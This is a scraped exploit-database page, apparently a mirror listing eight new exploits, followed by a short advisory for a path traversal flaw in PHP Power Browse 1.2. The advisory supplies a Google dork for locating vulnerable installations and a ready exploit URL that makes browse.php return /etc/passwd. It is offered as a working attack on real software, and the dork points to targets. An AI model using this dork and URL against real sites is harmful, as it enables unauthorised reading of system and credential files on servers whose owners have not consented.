428f25fc1c
8 new exploits NUUO NVRmini2 / NVRsolo / Crystal Devices and NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities ntop 2.3 <= 2.5 - Multiple Vulnerabilities Subrion CMS 4.0.5 - SQL Injection zFTP Client 20061220 - (Connection Name) Local Buffer Overflow PHP Power Browse 1.2 - Directory Traversal Davolink DV-2051 - Multiple Vulnerabilities WordPress Count per Day Plugin 3.5.4 - Stored Cross-Site Scripting NASdeluxe NDL-2400r 2.01.09 - OS Command Injection
19 lines
591 B
Text
Executable file
19 lines
591 B
Text
Executable file
# Exploit Title: PHP Power Browse v1.2 - Path Traversal
|
|
# Google Dork:
|
|
intitle:PHP Power Browse inurl:browse.php
|
|
# Exploit Author: Manuel Mancera (sinkmanu) | sinkmanu (at) gmail
|
|
(dot) com
|
|
# Software URL: https://github.com/arzynik/PHPPowerBrowse
|
|
# Version: 1.2
|
|
# Vulnerability Type : Path traversal
|
|
# Severity : High
|
|
|
|
### Description ###
|
|
|
|
This file browser is vulnerable to path traversal and allow to an
|
|
attacker to access to files and directories that are stored outside the
|
|
web root folder.
|
|
|
|
### Exploit ###
|
|
|
|
http://site/browse.php?p=source&file=/etc/passwd
|